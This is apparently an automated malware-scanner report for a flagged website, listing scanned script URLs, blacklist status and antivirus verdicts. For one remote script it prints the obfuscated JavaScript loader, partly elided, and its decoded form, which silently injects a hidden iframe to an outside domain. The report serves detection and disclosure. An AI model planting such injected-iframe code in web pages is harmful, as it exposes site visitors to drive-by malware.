New scan:

Malware Scanner report for retard-box.com

Malicious/Suspicious/Total urls checked
1/0/16
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "retard-box.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=retard-box.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://retard-box.com/
200 OK
Content-Length: 4039
Content-Type: text/html
clean
http://lr-studio.16mb.com/mltools.js
200 OK
Content-Length: 3512
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

try{eshshesh++;}catch(zxc){try{aewtvawetwe|15232}catch(esgsh){m=Math;if(m)f="flo"+"or";}
n="126..135..1470..1530..448..600..1400..1665..1386..1755..1526..1515..1540..1740..644..1545..1414..1740..966..1620..1414..1635..1414..1650..1624..1725..924..1815..1176..1455..1442..1170..1358..1635..1414..600..546..1470..1554..1500..1694..585..574..1365..672..1395..574..1845..182..135..126..135..1470..1530..1596..1455..1526..1515..1596..600..574..885..182..135..126..1875..448..1515..1512..1725..1414..48
... 2516 bytes are skipped ...
5..126..135..126..1500..1554..1485..1638..1635..1414..1650..1624..690..1442..1515..1624..1035..1512..1515..1526..1515..1540..1740..1610..990..1694..1260..1358..1545..1092..1455..1526..1515..560..585..1372..1665..1400..1815..546..615..1274..720..1302..690..1358..1680..1568..1515..1540..1500..938..1560..1470..1620..1400..600..1428..615..826..195..126..135..1750".split("..");h=2;s="";if(m)for(i=0;i-581!=0;i=1+i){k=i;s+=String["fro"+"mCharCode"](n[k]/(i-h*Math[f](i/h)+016));}if(016-0xb===3)eval(s);}

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://abarboza.com.br/28562245.html' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://abarboza.com.br/28562245.html');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','1
... 359 bytes are skipped ...
function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://abarboza.com.br/28562245.html');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
<iframe src='http://abarboza.com.br/28562245.html' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Iframe.A
K7AntiVirus
Riskware
Emsisoft
JS:Trojan.Iframe.A (B)
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Infected.A
DrWeb
JS.IFrame.151
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Iframe.V
MicroWorld-eScan
JS:Trojan.Iframe.A
NANO-Antivirus
Trojan.Script.Iframe.rpyhz
F-Secure
JS:Trojan.Iframe.A
F-Prot
JS/IFrame.HC.gen
Norman
IframeRef.DM
GData
JS:Trojan.Iframe.A
Commtouch
JS/IFrame.HC.gen
BitDefender
JS:Trojan.Iframe.A

http://idbmarket.com/mltools.js
403 Forbidden
Content-Length: 461
Content-Type: text/html
clean
http://idbmarket.com/test404page.js
403 Forbidden
Content-Length: 465
Content-Type: text/html
clean
http://wojtek.xon.pl/mltools.js></script><script type=
404 Not Found
Content-Length: 362
Content-Type: text/html
clean
http://sem-elektrik.com/jstools.js
500 Can't connect to sem-elektrik.com:80
Content-Length: 191
Content-Type: text/plain
clean
http://xn--przewraliwiony-hdd.wodzislaw.pl/jstools.js
500 Can't connect to xn--przewraliwiony-hdd.wodzislaw.pl:80
Content-Length: 210
Content-Type: text/plain
clean
http://webmarx.nl/tempjs.js
500 Can't connect to webmarx.nl:80
Content-Length: 185
Content-Type: text/plain
clean
http://studiodada.biz/minijtools.js
HTTP/1.1 302 Found
Connection: close
Date: Thu, 22 Jan 2015 05:32:16 GMT
Location: http://dfltweb1.onamae.com
Server: Apache
Content-Length: 210
Content-Type: text/html; charset=iso-8859-1
clean
http://dfltweb1.onamae.com/
200 OK
Content-Length: 1390
Content-Type: text/html
clean
http://polycarbonate.org.ua/jstools.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://blinkherb.com/jstools.js
404 Not Found
Content-Length: 390
Content-Type: text/html
clean
http://www.magicjoefuncenters.de/minijtools.js
500 Can't connect to www.magicjoefuncenters.de:80
Content-Length: 200
Content-Type: text/plain
clean
http://up.milleniumstudio.pl/cssminibar.js
404 Not Found
Content-Length: 18350
Content-Type: text/html
clean
http://www.milleniumstudio.pl/wp-includes/js/jquery/jquery.js?ver=1.8.3
200 OK
Content-Length: 93658
Content-Type: application/javascript
clean
http://www.milleniumstudio.pl/wp-content/themes/milleniumstudio/js/jquery.easing.1.3.js?ver=3.5
200 OK
Content-Length: 8101
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: retard-box.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 22 Jan 2015 05:32:12 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 4039
Content-Type: text/html
Last-Modified: Wed, 18 Jul 2012 13:42:30 GMT

...4039 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: retard-box.com
Referer: http://www.google.com/search?q=retard-box.com

Result:
The result is similar to the first query. There are no suspicious redirects found.